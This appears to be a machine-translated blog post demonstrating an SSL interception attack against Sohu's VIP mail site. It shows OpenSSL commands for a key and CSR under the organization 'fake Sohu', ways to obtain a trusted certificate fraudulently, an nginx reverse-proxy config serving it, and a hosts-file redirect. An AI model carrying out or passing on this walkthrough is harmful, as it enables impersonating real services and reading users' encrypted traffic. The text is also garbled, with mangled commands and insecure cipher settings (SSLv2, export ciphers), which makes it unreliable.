SSL eavesdropping attack practices

What we bring to you today is a successful example of SSL eavesdropping attacks from theory to practice.
What is important about SSL listening is that you need a valid SSL certificate, and the certificate name must be the same as the domain name of the attacked website.
To. At present, all major CAs have low-price SSL certificate applications. The lowest price is less than 10 US dollars, and even
Some domain name registrars purchase these certificates in large quantities and send you one free of charge when you register a domain name.
For low-price domain name SSL certificates, the Ca issues only one premise: as long as you have a specific domain name
And when the CA sends a confirmation email to this mailbox, approve will be fine.
Therefore, the key to the problem is how to intercept the confirmation email. But I believe some organizations have a way to do this.
.
Of course, there is a simpler way: Many software in China will secretly put their Root CA
Install it on your computer. The Windows security mechanism allows this import to the root
CA operations do not have any confirmation information or prompts. Even Microsoft provides a dedicated smallProgramUsed for Import
Certificate. As long as you find these software vendors, you can generate any certificate, and these certificates are
Is valid and no warning is reported.

I don't have to talk about it anymore. I started to work. Here, Sohu's VIP mailbox is used as an example (they can support SSL throughout the use process)
The key and CSR of vip.sohu.com.

Sam @ bra :~ $ Mkdir ssltest

Sam @ bra :~ $ CD ssltest
Sam @ bra :~ /Ssltest $ OpenSSL genrsa-out vip.sohu.com. Key 1024

Generating RSA private key, 1024 bit long Modulus
...
...
E is 65537 (0x10001)

Sam @ bra :~ /Ssltest $ OpenSSL req-New-key vip.sohu.com. Key-out vip.sohu.com. CSR

You are about to be asked to enter information that will be ininitialized
Into your certificate request.
What you are about to enter is what is called a distinguished name or a DN.
There are quite a few fields but you can leave some blank

For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country name (2 letter code) [au]: CN

State or province name (full name) [some-State]: Beijing

Locality name (eg, city) []: Beijing

Organization Name (eg, company) [Internet widgits Pty Ltd]: fake Sohu

Organizational unit name (eg, section) []: fake

Common name (eg, your name) []: vip.sohu.com

Email Address []: ssladmin@vip.sohu.com

Please enter the following 'extra 'attributes
To be sent with your certificate request
A challenge password []:

An optional company name []:

Well, we have an application for vip.sohu.com, and then we will issue this application.

[Image: sslhijack1]

Then the system will give you a lot of administrator-related emails waiting for you to select
[Image: sslhijack2]

After you select one, the CA will send a confirmation email to the selected email address, which contains a connection to open the connection.
You will be asked to confirm after confirmation... Hey, the certificate is ready.
[Image: sslhijack3]

[Image: sslhijack4] Sslhijack5] Sslhijack6]

Save the applied certificate, modify the nginx configuration file, add the certificate, and set
Reverse proxy to vip.sohu.com, which looks like the following

# HTTPS Server
#

Server {
Listen 443;
SERVER_NAME vip.sohu.com;

SSL on;
Ssl_certificate sslkeys/vip.sohu.com. CRT;
Ssl_certificate_key sslkeys/vip.sohu.com. Key;

Ssl_session_timeout 5 m;

Ssl_protocols SSLv2 SSLv3 tlsv1;

Ssl_ciphers all :! ADH :! Export56: RC4 + RSA: + high: + medium: + low: + SSLv2: + exp;
Ssl_prefer_server_ciphers on;

Location /{
Proxy_pass https://vip.sohu.com;

}
}

Save and restart nginx. Modify the hosts file of the Local Machine and point vip.sohu.com to the nginx domain name.
Server

127.0.0.1 vip.sohu.com

Open your browser and enter https://vip.sohu.com
, You will find .... No error or warning information! That is to say, the SSL certificate is successfully replaced, and then
That is to say, all your transmissions are hijacked.
After tests, colleagues in IE, Firefox, Safari, and other browsers have expressed that they are unaware of the Certificate replacement behavior and
The replaced certificate is strongly supported, promoting that the hijacked website is a highly reliable website.

Let's go back and briefly explain this process: a user accesses a website, but a layer of proxy has been inserted in the middle. Use proxy
A real and highly trusted certificate to exchange data with users. User
Use an SSL encrypted channel to exchange data with the proxy. After the data arrives at the proxy, it will be decrypted and listened for analysis. After proxy
The number of messages sent from a client to the website server.
Data is also transmitted over SSL encryption. The website server has no idea about this. Only requests sent by proxy can be obtained.

But the proxy is not the end user, and the data has already been monitored and analyzed.

Finally, let's say: do not be infatuated with SSL. SSL is just a legend.

Note:
1. Reprinted please indicate the source: http://wuhongsheng.com/it/2009/09/ssl-hijack/
2. Sohu's friends should not come to me for trouble or cross-province pursuit. I chose you because you are too secure and support SSL access.
Email
3. If you have time, please pay more attention to my dnspod. Recently, dnspod is recruiting people. It is hard to find anyone... Please
Introduce some talents for publicity

Https://www.dnspod.com/About/Jobs

The previous figure shows the original Sohu certificate, and the second one begins with the replaced certificate.
[Image: sslhijack7]

[Image: sslhijack8]

[Image: sslhijack9]

[Image: sslhijack10]

No related posts.

Tancee: http://www.tancee.com/
Hacker: http://blog.tancee.com/